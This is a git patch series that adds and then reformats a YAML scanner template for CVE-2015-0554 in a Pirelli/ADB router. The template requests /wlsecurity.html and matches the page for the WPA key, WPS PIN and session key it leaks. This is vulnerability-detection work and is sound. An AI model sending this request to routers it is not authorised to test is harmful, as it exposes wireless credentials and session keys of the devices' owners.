From e3c053917477dc3577346df01036446d326e1fd3 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Sun, 19 Dec 2021 20:23:13 +0700
Subject: [PATCH 1/2] Create CVE-2015-0554.yaml

---
 cves/2015/CVE-2015-0554.yaml | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 cves/2015/CVE-2015-0554.yaml

diff --git a/cves/2015/CVE-2015-0554.yaml b/cves/2015/CVE-2015-0554.yaml
new file mode 100644
index 0000000000..a243aafda8
--- /dev/null
+++ b/cves/2015/CVE-2015-0554.yaml
@@ -0,0 +1,30 @@
+id: CVE-2015-0554
+
+info:
+  name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure
+  author: daffainfo
+  severity: high
+  description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-0554
+    - https://www.exploit-db.com/exploits/35721
+  tags: cve,cve2015,pirelli
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wlsecurity.html"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "var wpapskkey"
+          - "var WscDevPin"
+          - "var sessionkey"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200

From 9461383161e6ce990818f22fdfa80b9178c8245e Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 20 Dec 2021 13:01:11 +0530
Subject: [PATCH 2/2] Update CVE-2015-0554.yaml

---
 cves/2015/CVE-2015-0554.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/cves/2015/CVE-2015-0554.yaml b/cves/2015/CVE-2015-0554.yaml
index a243aafda8..a879737372 100644
--- a/cves/2015/CVE-2015-0554.yaml
+++ b/cves/2015/CVE-2015-0554.yaml
@@ -6,9 +6,9 @@ info:
   severity: high
   description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2015-0554
     - https://www.exploit-db.com/exploits/35721
-  tags: cve,cve2015,pirelli
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-0554
+  tags: cve,cve2015,pirelli,router,disclosure
 
 requests:
   - method: GET
@@ -18,11 +18,11 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "var wpapskkey"
           - "var WscDevPin"
           - "var sessionkey"
-        part: body
         condition: and
 
       - type: status